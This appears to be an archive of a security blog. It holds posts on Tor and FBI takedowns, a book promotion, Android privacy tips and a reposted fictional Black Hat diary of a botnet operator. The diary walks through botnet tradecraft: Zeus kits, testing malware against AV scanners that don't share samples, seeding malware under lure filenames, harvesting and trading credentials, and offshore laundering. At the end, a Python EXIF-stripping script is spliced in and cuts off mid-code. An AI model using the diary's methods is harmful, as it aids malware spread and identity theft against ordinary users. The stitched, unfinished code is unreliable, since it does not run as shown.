10/11/13

Tor Wacky Times and the NSA

gAtO rEaD – that Tor (The Deep Dark Web) is now all messed up by the NSA, FBI and LEO so all you bad guys using the Tor network better watch out, or should they???

Aug 5 the FBI snakes in Freedom Hosting and put a number of websites out of business in the Dark Web. They let the flames go out that they caught a bunch of Pedophile sites with that bust, but it does not seem so.

The Attack on the Dark Net Took Down a Lot More Than Child Porn - http://gawker.com/the-attack-on-the-dark-net-took-down-a-lot-more-than-ch-1081274609 – gAtO contributed to this article –

Aug 19 – Millions of Tor Clients start to go up in numbers. What’s this all about, we get a bunch of Tor clients just hanging around doing nothing in Tor. Some say it’s a Bot-net or something like that. Then it grows to 4, 5 million Tor users and the last week or so it starts to go down again. So what is all this about all these Tor Clients and the Tor-Botnet?

Oct 3 – Silk Road gets taken down. Oh, the FBI had a copy of the Silk Road servers back in June just before the AUG 5 take down of FH by the FBI. So the Feds had Silk Road all this time and this is all they can do, can’t even get a few Bitcoin wallets - what a cluster fˆ%k—

Now you got NSA saying that Tor is cracked and the bad guys cannot use it. They claim that they can hack Tor anytime and anywhere with documents that a summer student left on how to hack the Tor network back in 2006. By the Way – most of these hacks do not work in Tor, maybe on a regular network but not on the Tor network.

So now gAtO goes in search of Tor sites and a lot of sites went down by hook or crook — BUT someone has started to replace these Tor Hidden Websites in the Tor Network – But something is FuNnY – all these sites use the same web templates -

So now you can take a walk down memory lane and see all the older Tor-Websites have gone away and new ones have magically re-appeared.

Now if this was the only place where this has happened OK sure, but at other Tor-Wiki Tor Link sites you will see the same thing – Commercial sites are all FuNnY and all the non-commercial Tor-websites are Tango Down.

So now Tor goes round and round but nobody knows what the heck is going on- In the Tor network – The Deep Dark Web run by Criminals or the FBI – you can answer these questions yourself by visiting the site –trust but Verify– ((not me))– gAtO oUt


01/10/13

Tor Users in South America

gAtO - was thinking about the different Tor users in Latin America while checking for a project and this made me wonder what is really going on. Let’s take a look at Brazil first:

All my charts will include from Jan-2012 to Jan 2013 -

Brazil shows from 170k users to 100k users; this is normal for Brazil as one of the largest countries in SA – But the problem I see right away is the Bridge Relays – these are the kinda secret OR that people use to hide if they think they are being monitored; you can see that they have gone down Big-Time - why is this happening, I have to ask myself. Is it that people are becoming more comfortable and do not fear the government, or are the actual bridge-relays just going down?

Next we travel down to Chile:

and we find that they do not have any OR but they have from 1000 users to a high of 1800 users:

Some of the other things: I cannot find OR for quite a few countries, like SPAIN, that is ODD, and Argentina has over 8, sometimes 10 OR for Tor users; this just makes no sense. I also checked for bridge OR but everywhere their use has gone down – I guess that they are becoming more comfortable that Tor works and just go with normal automatic Tor selection.

Let’s go up and check out Mexico – this one took me by surprise – Only 1 OR – I will have to set up some more tests with some new Tor Tools I am working on to get a better picture of what the heck is going down with Latino Tor Users worldwide – adios amigos - gATO oUt


10/25/12

The deep Dark Web -Book Release

gATO hApPy

AVAILABLE @ AMAZON - http://www.amazon.com/dp/B009VN40DU

AVAILABLE @SmashWords website  @http://www.smashwords.com/books/view/247146

I learned that I hate WORD: – but it’s the general format for publishing - text boxes get embedded and you can’t format to EPUB or .mobi or anything – solution after going lOcO gAtO - was copy and paste into txt editor – save as RTF then copy paste back into a new WORD document and then reformat everything from scratch – and copy over the pictures – as you can tell I had fun-..-ugh mEoW F-F-F-F as much fun as a hairball but if it gets the message out “FREEDOM OF SPEECH IN CYBERSPACE” then we’ve done our job, anyway I hope you read it - Thank you Pierluigi, the best friend a security gAtO ever had - gATO oUt

This book covers the main aspects of the fabulous and dangerous world of “The Deep Dark Web”. We are just two cyber specialists, Pierluigi Paganini & Richard -gAtO- Amores; with one passion and two souls, we wanted to explain the inner workings of the deep dark web. We have had a long collaboration in this effort to document our findings; we made infiltrations into dark places inaccessible to many to give you, the reader, a clear vision of the major mystery of the dark hidden web that exists today in the Tor Onion network.

The Web, the Internet, mobile cell devices and social networking have become commonly used words that identify technological components of the daily Internet user’s experience in cyberspace. But how much do we really know about cyberspace? Very, very little. Google / Yahoo / Bing only show us 20% of the Internet; the other 80% is hidden to the average user unless you know where to look.

The other 80% of the Internet is what this book is about: the “Deep Dark Web”, three words with millions of interpretations, a mysterious place on the web, the representation of hell in cyberspace but also the last opportunity to preserve freedom of expression from censorship. Authorities and corporations try to discourage the use of this untapped space because they don’t control it. We the people of the free world control this network of Tor Onion Routers, run by volunteers around the world.

The Deep Dark Web seems to be full of crooks and cyber criminals; it is the hacker’s paradise, where there are no rules, no law, no identity in what is considered the reign of anonymity, but this is also the reason why many of the persecuted find refuge and have the opportunity to shout to the world their inconvenient truths.

The Deep Dark Web is a crowded space with no references, but in reality it is an unimaginable mine of information, a labyrinth of knowledge. In the book we will try to take you by the hand to avoid the traps and pitfalls, hopefully illuminating your path in the dark.

Cybercrime, hacktivism, intelligence and cyber warfare are all pieces of this complex puzzle, in which we will try to make order. Don’t forget that the Deep Dark Web has unbelievable opportunities for business and governments; it represents the largest on-line market, where it is possible to sell and acquire everything, and dear reader, where there is $money$ you will also find banking, financial speculators and many other sharks.

Do you believe that making money in the Deep Web is just a criminal prerogative? Wrong. The authors show you how things work in the hidden economy and what the future prospects are for its digital currency, the Bitcoin.

This manuscript presents both faces of the subject: it illustrates the risks but also the legitimate uses of anonymizing networks such as TOR, adopted by journalists to send file reports before government agents censor their work.

Here are some questions we may answer:

How many people know about the cyber criminals and their ecosystem in the deep web?

How many have provided information on the financial systems behind the “dirty affairs”?

How do law enforcement and governments use the Dark Web?

Hold your breath and let’s start the trip into the abyss of knowledge to find answers to the above questions. We hope that with this book you can learn something new about – The Deep Dark Web.

10/22/12

Diary of a Professional Botmaster

gAtO - found this and had to share with you. If you want to know how a botMaster is created check this out. A simple software engineer becomes a botMaster; sounds like “surreal Walter White in Breaking Bad”. First you will notice that this was written in 2010 and it’s been a model of the botMaster persona. This is a fictional tale; now add the Tor onion network to hide the c&c and mobile Android /iApple devices, but it comes so close to the real edge, have fun reading - gAtO oUt

Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

 Diary of a Professional Botmaster 

June 20, 2009 

I’ve decided to restart the diary. I used to keep one many years ago, but stopped when I moved down to London and started my MSc in Computing & Security at King’s College – much use that degree ever turned out to be!

I found out yesterday that me and most of the team are going to be made redundant at the end of the month. It appears that the company doesn’t need so many developers after they decided to sell off the Private Banking division to some German brokerage and they ditched those annoying trader guys up on the 18th floor a couple of months back.

Anyhow, I’d better start looking for a new job. The market’s pretty tight at the moment. It seems that all the banks are laying off folks and the developers are the first to go. Not surprising really. I’ve been thinking about setting up my own business for a while though. Perhaps it’s time to bite the bullet and just do it. Take that redundancy cheque and invest it in myself?

June 22, 2009 

Was down at the pub for most of the afternoon with Bill & Ted. We were tossing around ideas of businesses I could start – in particular, businesses that could make me a millionaire in a year’s time. Granted, most of the ideas were completely off the wall and would be destined to fail or end in my bankruptcy within weeks of starting them (or would likely land me in prison within short order) but some of the grey areas look like they could be pretty exciting.

Ted was going on about botnets and how they’re not really illegal. Sounds like rubbish to me, but I’ll check it out anyway.

Last year when we had that worm go around the office and the Ops guys spent a couple of weeks chasing it down and cleaning up systems – that was pretty cool, and I can see how the authors of that worm could make quite a bit of money from it with a little banking knowledge. I don’t think they ever got caught either. Ted told me that James – the lardy guy over in second-level helpdesk – said that they were still having outbreaks of that very same worm and uncovering other infected computers almost every day (after an entire year). How cool is that!

June 25, 2009

I’ve been reading up on botnets. The Internet is full of great information about them. YouTube even has tutorials on how to create the malware, deliver the bot agents, manage the Command and Control (CnC) and turn the stolen data into real money.

I did some digging on these hacker forums too. They’re pretty cool. Most are well organized and there are bundles of tutorials, guides and discussion threads on all aspects of the botnet business. There’s even entire forums dedicated to matching buyers with sellers – Craigslist style!

June 26, 2009

Had a great session with Demitri over IRC today. He’s been running a handful of botnets over the last couple of years and seems to know what he’s talking about. Came across his advertisement on one of the boards and was offering a free 2-hour test-drive of his botnet CnC console – so I got to play with a couple hundred computers. Some of the functionality was grayed out, but I got a chance to DDoS the company’s website – from the comfort of my desk ?

I spoke with a couple of the company Internet ops guys afterwards – being careful in what I said of course – to see if they noticed. Apparently they did. It didn’t bring down the site, but they were alerted from their IPS. Supposedly this is a common enough occurrence and happens most weeks. I guess I’m a little disappointed with that. I wonder how many bots I’d need to take down the webserver?

Dimitri said that he normally uses about 5,000 bots to take down big websites – but 200 is more than enough to wipe out corporate VPN appliances. Handy to know!

June 27, 2009

Sat down with Jim the lawyer this afternoon. I wanted to go over the details of setting up my own contracting business. Since I haven’t had much luck on the replacement job front looking for permanent roles, I figured I’d just go down the contracting route – since there are more opportunities going for temporary software engineering positions.

There’s not much to creating your own business. Jim helped me with all the forms – so I just need to mail them off tomorrow, and I’ll be on the way to creating my first business. He also explained some of the nuances to setting up a company in some other countries and the possibilities of “offshore accounts” and tax havens. I took plenty of notes. You never know when that’ll come in useful.

June 28, 2009 

Spent all day harvesting hacker boards for tools and playing with them on a couple of old laptops. This stuff really is easy.

I even came across this guy(?) on one of the chat forums (who can’t have been more than 14 years old) who was selling a botnet of 2,000 computers for $400. The funny part though was when the flame war started about how overpriced that was. Apparently you can pick up 2,000 computers for as low as a $50 Walmart giftcard.

June 29, 2009

I woke up this morning with an epiphany (or was it just a delayed hangover?). I’m going to start my own botnet – but not just any botnet, I’m going to do it properly and make a business from it! I’ll still pursue any legit consulting roles that crop up – still got to eat and pay the bills – but it’ll make a convenient front while I’m building botnets.

Why the botnet business? Because it’s cool! Well, actually, it’s more than that. I don’t want to work forever in a dull office job and, from what I can tell, botnet building seems to be pretty profitable – and not many people get caught. And, if they do get caught, they basically only get a slap on the wrist.

Having read quite a few of the news articles about the folks that got caught, it looks to me that they got caught because they did something stupid and/or they clearly crossed the criminal line – and the police were forced to do something about them.

I’m pretty sure that I’m smarter than that. Didn’t any of these guys ever consider building a business plan first? Plan it all out – have a strategy and stick to it!

I’ve left the computer downloading a few tool collections I found on one of the Argentinean malware blog sites. 4Gb of tools, kits and exploits. Awesome! And it’s all free!!

June 30, 2009

Final pay date from the “old job”, and I’m now officially free of the company. Ended up with a little over £35k after taxes too – so that’ll tide me over the next few months as I pull together my new business(es).

Last night’s download worked out pretty good. There are hundreds of botnet kits in there – complete with CnC interfaces, exploit packs, phishing templates, malware creators and obfuscators. Supposedly there’s a high likelihood that many of them are backdoored, but who cares – it’s time to play! I’m going to try a couple of them out on the corporate laptop before I have to hand it back – preferably one with a good rootkit. I wonder if they’ll ever notice?

July 1, 2009

Woke up this morning having dreamed about what kind of botnet business I want to build. Also figured out a few “rules” that I want to work towards – maybe more of a “guiding principles” perspective really.

1. DON’T GET CAUGHT – which means I’m going to be damned careful in setting up everything and making sure that nothing can be traced back to me personally. Sure, there’ll be layers to the onion, but I’m not going to allow myself to be let down by poor tradecraft and bad habits. Those hackers in France and Spain got caught because they didn’t have enough layers of deniability and mixed the use of their personal systems and their botnet infrastructure.

2. DON’T DO CRIMINAL HARM – While I’m pretty far removed from planning on being a Robin Hood, I’m not going to get mixed in with the Mob or other organized crime. Similarly, I’m not going to get involved with any political or religious drivel. I also don’t want to cause any physical harm – as that’s a sure way of getting the interest of the police – and, besides, it’s not who I really am. The more legit I can make this business, the easier it’ll be to bow out after I’ve made my money.

3. RESILIENCE AND SCALABILITY ARE MY FRIENDS – Since this is going to be a business, based upon the lessons I learned from the Private Banking firm and all I’ve been reading over the last couple of weeks, it should be possible to build pretty big botnets really fast – if I plan it well.

Resilience will be even more important though. Getting back to the “don’t get caught” principle and the layers of deniability (and abstraction), if I plan for making the CnC and distribution systems robust, I’ll endeavor to split things over several hosting providers and geographic regions.

Also spent some time on the hacker portals and responding to some of the threads. Some of the more interesting forums are currently closed to me because I haven’t developed a site reputation – which can be gained by posting 20, 50 and 100 messages. This’ll be pretty easy though. Lots of questions about coding problems which I can answer without too much thought.

July 3, 2009

I think I’ve managed to plan out a few more CnC infrastructure ideas. I found a few more tutorials online – and also some good message threads on domain registration tactics, Dynamic DNS operators and folks that’ll distribute malware for a few cents. It appears that a good rate at the moment is around $100 for 2,000 guaranteed installs. A little pricey if I was buying, but it sounds like good money if I was to become a seller ?

I also realized that I forgot a rather important principle for inclusion – my zero’th principle…

0. I WANT TO BE RICH – but, more to the point I want to retire rich, not be the richest bloke in jail.

Which all means that I need to do some more investigation on how to secure the money. I don’t want the money to be directly traceable to me – nor to the consulting company I’ve just created – but I’m going to need ways to pay for stuff and ways to accept payments. All deniable of course.

Made a few new connections on the hacker forums. Now that I’m posting to some threads I’m getting direct messages from some of the folks there. A couple of the guys that reached out were trying to pimp out their services – both of them malware dropper services. Someone else asked if I was with the FBI.

The USA perspective was interesting. I hadn’t realized that the guys on the forums can see/track my IP address and from there work out where I’m located. I’ll have to do some experimenting with anonymous proxies and TOR networks. I ran across a few video tutorials on the topic yesterday. That’ll be my homework for this evening – getting something setup and hiding my IP address forever more…

July 4, 2009 

Surprise in the snail mail – company papers just came back. I’m now the CEO of Thrull Networks! Cool company name huh! I wonder if anyone will ever figure it out – thought it was apt at the time. Maybe it’s a little too close to the mark. 5% on the dumbness scale I guess. Will have to be smarter in the future. I’m going to keep it though. Even saw that some related .com and .net domain names are available for registering.

Earlier this morning I went out and bought a couple of new laptops. Nothing special, just some small(ish) $800 laptops that I’m dedicating to my botnet business – and will never taint them with the Thrull Networks consulting business. Although I will be claiming them as tax deductible expenditures.

Also spent most of today coming up with the rules I’m going to work under for achieving principles (1) and (3)… and maybe a little of (0) too.

So, the new rules…

A) Separate systems for work/pleasure/personal and botnets. The two new laptops are JUST for the botnet business. I’ve already installed a full disk encryption scheme and come up with a 44 character password. I doubt that anyone’ll be breaking that mother anytime soon.

B) Never connect to the botnet CnC or do any botnet-related business from my home network. Given the general availability of free WiFi at Starbucks and McDonald, etc., I’ll use those. A couple of additional rules there though – don’t frequent them in a regular pattern (sounds like a Tom Clancy spy novel), and don’t use stores that have CCTV setups. I was tempted to use some of the unsecured WiFi networks in the neighborhood – but that may be a little too close for comfort. Besides, the coffee will be better than what I have at home.

C) Change the MAC on the laptops regularly. I’ve already downloaded and installed a cool piece of software that does precisely that. I’ve also installed a bundle of different Web browsers – but have deliberately not installed any plug-ins etc. I was reading recently a couple of online projects that showed how they could query your Web browser through JavaScript and the DOM to build a signature of the browser – and how “unique” that became once you started installing plug-ins and how regularly you kept them patched. So I’m planning on keeping the laptops as simple and “dumb” as possible.

D) Never connect directly to the botnet infrastructure. Lesson learned yesterday. TOR and anonymous proxies are now default on all my computers – especially the two new laptops!

E) While encryption is my friend. Asymmetric crypto is going to be my live-in lover. Thanks Bruce for the tips!

July 9, 2009

Been playing around all week with the DIY kits I downloaded a couple of weeks back. The Zeus kit is pretty impressive with its polymorphic malware generator. I was running its output past some of the free online antivirus scanning portals and noting which (if any) antivirus tools detected the samples. On average, only a couple of the AV tools detected anything – and if they did, it was only some kind of generic signature such as w32.suspicious etc.

I was originally using www.virustotal.com, but when I tried to find other AV portals that might have more AV products in them I stumbled over a couple of cool threads that explained why I shouldn’t use that site (and a few others) because they share the malware samples with the AV vendors. Therefore the AV vendors will have detection signatures for the malware out within a few days. That sucks – because I probably just wasted a few dozen cool pieces of Zeus malware. Luckily there were plenty of alternative AV testing portals being recommended and (yet more) tutorials on how to set up your own malware QA testing regimes.

I’ve settled on www.virtest.com now. They charge a few dollars for the privilege of testing the malware I submit, but they allow me to upload multiple malware samples simultaneously in bulk format. They also have some other services for checking out the malware delivery websites too – so you can check to see if the exploit packs used by the Zeus kit (and others) are correctly installed and whether the other AV components (e.g. HIPS) detect the infection. Their VIP account is $50 per month. I’ll have to figure out a good way to pay for the service. Something that can’t be traced back to me personally…

July 10, 2009 

I spent the entire morning down at the Starbucks down by the park using their “free” WiFi. Cost me about $26 in coffee for the 4 hours.

Anyway, I set up a handful of free webmail accounts. A couple of Gmail accounts, a couple of Hotmail accounts and a couple of Yahoo accounts. I entered in garbage “personal” information, but gave them all the same password – “Lucky4Me*Unlucky4U”. They’re disposable accounts for trialing out a few new concepts and learning what works.

Next, I created a couple of websites to host the Zeus CnC console pages. I had originally been worried about how I was going to have to pay for the web hosting – but a quick search for “free web hosting” revealed plenty of services – including portals that provide detailed reviews of all the providers. Woohoo.

It took me about an hour to create the sites on 0000free.com. It’s the first website I’ve ever built – and I had to learn some PHP while doing it all. On the job training if you like. The index page is just a copy/paste job from some car-parts website – and the Zeus CnC configuration and bot registration pages are off in a subfolder. They’re accessible if you know the URL, but they’re intentionally not linked to from anywhere. I don’t really want some search engine crawling the sites and flagging the Zeus CnC.

I’ll be spending some time later tonight generating some malware samples that’ll use the two new CnC URLs. That’ll be hard work – should take me all of 10 seconds ?

July 11, 2009 

A botnet is born. I’m a father!

So, this morning I headed off to the Starbucks over by the athletics center to play with my newly minted malware and the CnC services.

I originally set up a VMWare session on the laptop and infected it with the new malware bot agent and watched it reach out to the CnC server. Meanwhile I browsed to the website, logged in to the CnC console, and saw the test victim register itself – so I spent a good half hour testing out all the features of the bot agent. It’s pretty slick. Ugly, but slick. The toughest part of all this was setting up the TOR agent to provide the anonymous web access in reaching the CnC console.

To get the bot malware into play I decided to upload the samples to the Newsgroups – since they don’t require me to host the files directly and also provide anonymous uploading. One file I named “Windows7KeygenCrack.exe” and the other “iTunesDRMRemover.exe”, and included some BS text about how good the tools are. They were both uploaded to a handful of different alt.binaries. groups using different email accounts and source IP addresses.

I hung around Starbucks for another hour, but didn’t see any victims appear on the Zeus console – so paid a visit to Bill & Ted and grabbed lunch with them in town. Ted’s already gotten a new job at some Scottish bank. Chose not to tell them about my botnet research. The ideas may have come from them originally, but I’m not about to share this secret.

Anyhow, I popped in to the McDonalds by the railway station at about 4pm and connected to the Internet to see how my “botnet” was coming along. Surprise, surprise, I had three new members to my botnet. How cool is that! I was well chuffed with that small success and subsequently spent an entire hour connecting to each computer and checking out what I could access on their systems. Just as I was about to pack things up and head off home a fourth computer joined my botnet.

I couldn’t stop smiling on my way home from McDonalds. I think I may have even said “I’ve just fathered my first botnet” somewhere on the walk up the hill. Haha.

Guess where I’ll be tomorrow morning…

July 12, 2009 

Got to Starbucks early this morning and was online with my baby botnet by at least 9:30am. It had swollen over night and the counter had reached 18 computers – but I could only contact 6 of them. The others must have been turned off or something.

For the next hour (and second cup of Java) I created a couple dozen new malware bot agents and configured them to point to the same two Zeus CnC servers I’d set up yesterday. I then went on to use the same Newsgroup tactics – but picking a few other juicy social engineering file names (and descriptions) – e.g. “AcrobatProfessionalKeygen.exe”, “RossettaStoneLanguagePackUnlocker.exe”, etc.

By the time I left the coffee shop the botnet had grown to 23 computers – mostly in the US and the Netherlands, but a couple from Australia and Taiwan.

Went home afterwards to do some more studying and recon, and found some good information on how to automatically pull back account and identity information from Zeus malware clients. There are a number of scripts that you could run automatically on each botnet computer to extract their webmail credentials, anything they’ve told their IE or Firefox web browsers to remember, etc.

I also found some plug-ins for the Zeus CnC console that help to manage the data that comes back from the keylogger and other info-stealer components – which I installed on the web servers later on my return trip to Starbucks – and left CnC commands for the botnet malware to automatically start collecting and uploading the identity information.

By 7:30pm my botnet had reached 200 members. It’s no longer a “family unit”; it’s a small village and I’m Pastor of the flock.

July 14, 2009

Had a couple of contract interviews yesterday, and hadn’t managed to check on how my baby was coming along for a couple of days. So, it was with a rather pleasant surprise I noted that the botnet had reached 3,320 computers.

Actually, I’m not so sure about the number and whether it’s a good number to rely upon. The number of computers “active” were about 450 – and I tested that I could control them OK. As for the rest, well, they were “offline” – but I did have files from all 3,000+ computers sitting on the CnC server – so I guess they were successfully compromised with my botnet agent.

I moved all the files off the two CnC servers and copied them to the laptop. When I got home I started doing some analysis.

Brief stats (for posterity)…

942 Facebook accounts

766 Twitter accounts

322 Gmail accounts

318 Hotmail accounts

193 Yahoo accounts

76 Paypal accounts

… and lots of sub-50 accounts – many for services/websites I’ve never heard of before. All told, about 5,500 different accounts.

BTW I’m not sure I like using Starbucks – I’m spending too much money on coffee there ?

July 15, 2009

The botnet’s now reached 4,000 computers.

There was an email from 0000free.com waiting for me from yesterday. Apparently I should be upgrading to a paid account because of all the traffic/hits the site has been receiving. Just as well I moved off all the identity information and files – I was almost over the file quota too!

July 16, 2009

4,300. What’s the population have to be before a village can be called a town?

Created another couple of dozen malware for release on the Newsgroups since the botnet growth appeared to be slowing down.

July 17, 2009 

I think I’m the Mayor of a small town now. I visited the Starbucks down by the strip mall this afternoon and logged in to the botnet. 11,435 computers!

At first I thought it may have been a mistake since the size jump was so large. Introducing a couple new malware downloads didn’t get that much of a leap last time. But I figured it out after about 20 minutes of probing and searching. It would seem that the new file “MichaelJacksonDeath-OfficialAutopsyReport.exe” was more successful. It also managed to make its way on to some Torrent server and plenty of people are downloading it.

New lessons learnt from yesterday’s efforts:

1) Tying social engineering to media and entertainment current events yields more additions to a botnet.

2) Torrent networks can make the botnet malware reach more people faster.

July 18, 2009

Just as well I downloaded all those new files yesterday, because the botnet is dead. I’m no longer the Mayor.

This morning I popped on over at the Library for a bit of their WiFi access and tried to connect to my CnC servers. Nothing – well, more than nothing, the Zeus CnC pages had been deleted and my webserver account had been disabled. There were instructions to phone the helpdesk to discuss reactivation.

Waiting in the inbox of the webmail account I used to register the free websites was an email telling me that my site may have been hacked and was being used for malicious purposes.

A quick Google revealed that both CnC URL’s and configuration files were listed up on ZeusTracker.abuse.ch.

Bugger!

July 19, 2009 

All is not lost. I’ve still got all those identity/account detail files from all my botnet computers. The total – adding the first batch with the batch from the 17th – comes to a little shy of 19,000 unique sets of credentials. I can still access any (if not all) of those stolen accounts anytime in the future.

Better yet – there’s absolutely nothing that can be tracked back to me. Sure, the botnet is now out of my control (and computers are still being compromised with the malware which is still in circulation in the Newsgroups and Torrents), but I’m safe and have learnt a few new lessons.

That said though, it’s about time I started to focus on bringing in the money from the botnets. I’m not going to get that Porsche building botnets for botnets sake. I could easily enough find buyers for the stolen information – the hacker forums are overflowing with buyers and agents. That’s not a problem. The problem lies in converting “Internet money” into cash – and laundering those transactions sufficiently.

With that in mind, I spent all afternoon researching offshore banking and the creation of anonymous accounts. Disappointingly those infamous Swiss Numbered Accounts don’t exist anymore – at least not like they do in the movies.

I managed to narrow it down to three banking accounts and, as my finances grow, I’ll start to bring them on line. I’ve found agents that will allow me to set up Swiss banking accounts online. They require proof of address, but they provide a level of guarantee that personal information will not be supplied to anyone outside of Switzerland. The Cayman Island accounts are easier to set up – and don’t require an agent – but require a higher deposit. They’re a little too rich for my tastes at the moment – but I’ll probably add an account once I break the $100k per month revenue stream (if ever?).

No, the account I created online this evening was for a Panama Bearer Share Corporation account. As of an hour ago I’m now CEO of a second company – “Net Wizards LLC.”. I deposited $5,000 into the account. Not only does it provide an anonymous business front and full international banking facilities, but it comes with 4% interest and the credit cards issued against the account should be arriving in 10 days time.

July 20, 2009

I’m back in the botnet business!

I was keeping a couple of my hacker forum accounts live by responding to a few message threads and I stumbled across a couple of reputable botmasters that were in the process of selling off sections of their botnets. They were offering batches of 100 bots with dedicated CnC hosted servers for $200 each.

Most significantly though – there were alternatives to the $200 in Webmoney or PayPal funds – they’d accept hacked webmail accounts, Facebook accounts and Twitter accounts.

After a little back and forth, we agreed on the trade and exchange mode (had to use an agent that was pre-vetted on the forum – one of the administrators – who charges 10% for his time/effort). From X4cker I picked up 600 bots and two CnC servers (in the Ukraine no less) for 3,000 Gmail accounts and 1,000 Hotmail accounts. From Dankar007 I managed to procure 500 bots for the princely sum of 500 PayPal accounts. The site administrator/agent didn’t do too badly out of the deal either. I’m sure that he (or she?) now has his own copies of all those accounts.

After some quick verification and having tested the access to the two botnets, I created a new Zeus botnet agent and pushed it down to all 1,100 bots – and changed the admin credentials on the CnC servers.

Not only am I back in “business” with a brand new botnet, but I’ve still got all those account details from the previous botnet that I can continue trading/reselling to other operators.

– I just realized that this diary is now precisely one month old. In that month I lost my job, founded two companies, become a CEO, built a botnet, lost a botnet, established a reputation in the hacker communities, opened an international banking account, and just purchased my second botnet.

Time to start pulling together the business plan for constructing a profitable money-making botnet! The “march to a million” sounds like a great idea, but I’d prefer to aim for Steve Austin’s The Six Million Dollar Man. I’m pretty confident that I can reach that target over the next 11 months! What would mom say?

Original BlackHat PDF file -

http://media.blackhat.com/bh-us-10/whitepapers/Ollmann/BlackHat-USA-2010-Ollmann-6millionDollarMan-wp.pdf

ZeuS Tracker Statistics – https://zeustracker.abuse.ch/statistic.php

Note: This is a fictitious (and subtly macabre, but hopefully humorous) diary account loosely based upon real investigations of professional botnet operators and the criminal enterprises they created to monetize the data and systems under their control. It does not represent a single botnet operator, rather it represents a concatenation of notable business models, decisions and discussions from a spectrum of criminal operators. Names and places have been deliberately altered. No animals were harmed in the making of this diary.

 

08/29/12

sms bot 4 Android in the onion

Privacy On The Android

gAtO think —everything that follows is for android phones only. I hate phones; today’s devices are a little too much power. As I predicted back in January, cell devices will become the linchpin of corporate security. Nothing should be thought of as 100% safe or guaranteed and/or legal in your area; these are just things that you should consider, and of course getting an iPhone may be easier. —/ cyber criminals are using the Android cell device in new ways bypassing your phone’s security—/  you should always do your own research and be a cyber critical user.

[1.] if you haven’t done it already, flash your android and put Cyanogen Mod 7 on there. just rooting your phone isn’t good enough. you need to flash it and get all that bullshit and bloatware off your phone. Info on how to do this can be found at http://www.androidforums.com/

[2.] firewall your phone. Droidwall is a firewall based on iptables for linux. it will prevent data access to apps unless you specifically allow it. LBE Privacy Guard will limit access to specific functions for apps. for example, it will prevent apps that have no business requiring contact information or fine gps location from accessing said functions. LBE can also block apps from requesting IMEI info. both work very nicely with each other. LBE Privacy Guard does NOT prevent your carrier from accessing your location. it only prevents the apps you define from accessing the gps function, as well as almost any other function you choose. more information is available by searching the android market.

[3.] apply encryption and security to calls & texts. Redphone is an end-to-end encrypted VOIP app and TextSecure is an encrypted (you guessed it) app for texting. in order for these to work, the person you are trying to call or text must have the apps installed on their phone as well, so it’s not good for calling house phones or any other phones besides other androids, really. i believe apple blocked redphone from their app store so that’s just one more reason why apple sucks. both apps were written by moxie marlinspike and the guys over at whisper systems. there’s also another app by the guardian project for secure texting called Gibberbot that’s definitely worth checking out. more info is available in the android market or by visiting http://www.whispersys.com/ (or guardianproject.info for gibberbot)

[4.] delete exif data and obfuscate pictures. ObscuraCam by the guardian project can do just that. you can import pictures into ObscuraCam or you can use this app to take pictures with. it can remove exif data and it can pixelate faces to prevent facial recognition. (for those who don’t already know, exif data is identifying metadata embedded in pictures such as gps location, timestamps, phone make/model, etc. exif data exists on all pictures taken with digital cameras, not just phones). more info can be found in the android market or at https://www.guardianproject.info

[5.] orbot is TOR for android and orweb is the accompanying browser. if you didn’t already know this, then you obviously don’t visit the TOR website enough. orbot works well with tethering and will allow you to surf anonymously even if you don’t have TOR on your computer. not sure how secure it is compared to regular TOR, and i certainly wouldn’t recommend doing anything too serious over your phone since your phone is basically a self imposed bug in your pocket, but if necessary, it’s better than nothing. more info: the tor website or guardianproject.info
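Item 4's point about exif data, as an added example that is not part of the original list: a check you can run on a picture before sharing it, which finds the Exif block in a JPEG, reports whether it carries a GPS pointer, and writes a copy without it. The function names and the sample bytes are constructed for this example; only Exif APP1 segments are handled (XMP, IPTC and comment segments are left alone).

```python
import struct

EXIF_ID = b"Exif\x00\x00"   # identifier that opens an Exif APP1 payload
GPS_IFD_TAG = 0x8825        # IFD0 entry that points at the GPS sub-directory


def segments(jpeg):
    """Yield (marker, offset, total_len, payload) for header segments up to image data."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = jpeg[pos + 1]
        if marker == 0xDA:          # SOS: compressed image data follows, stop here
            return
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(jpeg):
            raise ValueError("truncated or corrupt segment")
        yield marker, pos, 2 + length, jpeg[pos + 4:pos + 2 + length]
        pos += 2 + length


def exif_has_gps(payload):
    """True when IFD0 of the embedded TIFF structure contains a GPS pointer."""
    tiff = payload[len(EXIF_ID):]
    if len(tiff) < 8 or tiff[:2] not in (b"II", b"MM"):
        return False
    e = "<" if tiff[:2] == b"II" else ">"       # byte order of the TIFF data
    magic, ifd0 = struct.unpack(e + "HI", tiff[2:8])
    if magic != 42 or ifd0 + 2 > len(tiff):
        return False
    (count,) = struct.unpack(e + "H", tiff[ifd0:ifd0 + 2])
    for i in range(count):
        entry = tiff[ifd0 + 2 + 12 * i:ifd0 + 14 + 12 * i]
        if len(entry) < 12:
            break
        if struct.unpack(e + "H", entry[:2])[0] == GPS_IFD_TAG:
            return True
    return False


def metadata_report(jpeg):
    """List every Exif segment with its position, size and GPS flag."""
    return [{"offset": pos, "bytes": total, "gps": exif_has_gps(payload)}
            for marker, pos, total, payload in segments(jpeg)
            if marker == 0xE1 and payload.startswith(EXIF_ID)]


def strip_exif(jpeg):
    """Return a copy of the file with all Exif APP1 segments cut out."""
    out, keep_from = bytearray(b"\xff\xd8"), 2
    for marker, pos, total, payload in segments(jpeg):
        if marker == 0xE1 and payload.startswith(EXIF_ID):
            out += jpeg[keep_from:pos]
            keep_from = pos + total
    out += jpeg[keep_from:]
    return bytes(out)


def build_sample():
    """Constructed sample: JPEG-shaped bytes with a JFIF header and an Exif GPS pointer."""
    tiff = (b"MM\x00\x2a" + struct.pack(">I", 8)              # TIFF header, IFD0 at offset 8
            + struct.pack(">H", 1)                             # one entry in IFD0
            + struct.pack(">HHII", GPS_IFD_TAG, 4, 1, 26)      # GPS pointer -> offset 26
            + struct.pack(">I", 0)                             # no further IFD
            + struct.pack(">HI", 0, 0))                        # empty GPS directory

    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

    return (b"\xff\xd8"
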